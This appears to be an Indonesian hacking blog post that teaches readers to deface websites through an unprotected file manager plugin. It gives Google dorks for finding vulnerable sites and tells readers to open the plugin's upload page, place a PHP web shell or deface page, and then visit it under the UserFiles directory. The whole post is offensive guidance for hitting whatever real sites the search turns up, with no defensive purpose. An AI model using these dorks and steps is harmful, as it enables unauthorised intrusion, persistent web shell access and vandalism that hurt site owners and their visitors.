Cilacapcyber - Hallo sobat kali ini mimin akan mengshare cara deface FRM plugins mungkin ada yang belum tau caranya nah mimin akan kasih tau nih simak caranya ya :)
Dorks:
inurl:/filemanager/userfiles/filetype: pdf
inurl:/filemanager/index.html
Dork bisa dikembangin bila sobat mau
ini contoh Exploitnya sobat
https://www.site.com/filemanager/index.html 2
nah sobat langsung aja ke google atau browser kesayangan sobat dan ketikan dorknya dibrowser
contoh : inurl:/filemanager/userfiles/filetype: pdf atau inurl:/filemanager/index.html
nanti akan muncul beberapa situs sobat tinggal pilih yang ingin sobat eksekusi :D
apabila sobat sudah mengklik url situsnya akan menjadi https://www.site.com/filemanager/UserFiles/File/xyz/abc.pdf 2
Sekarang sobat Hapus kata kunci setelah manajer file
misalnya:
Sebelumnya: https://www.site.com/filemanager/UserFiles/File/xyz/abc.pdf 2
Setelah: https://www.site.com/filemanager/
nah Sekarang sobat temukan opsi unggah di sana dan unggah shell atau Halaman deface
sobat di sana file sobat akan diunggah di direktori file pengguna
nah Untuk Melihat shell unggahan sobat atau file goto
https://www.site. com / UserFiles / Shell.php 1
https://www.site.com/UserFiles/deface.html 2
atau
https://www.site.com/UserFiles/directory/Shell.php
https://www.site.com/UserFiles/directory/deface.html
semoga bermanfaat artikel Cilacpcyber mimin mengucapkan Terima kasih 🙏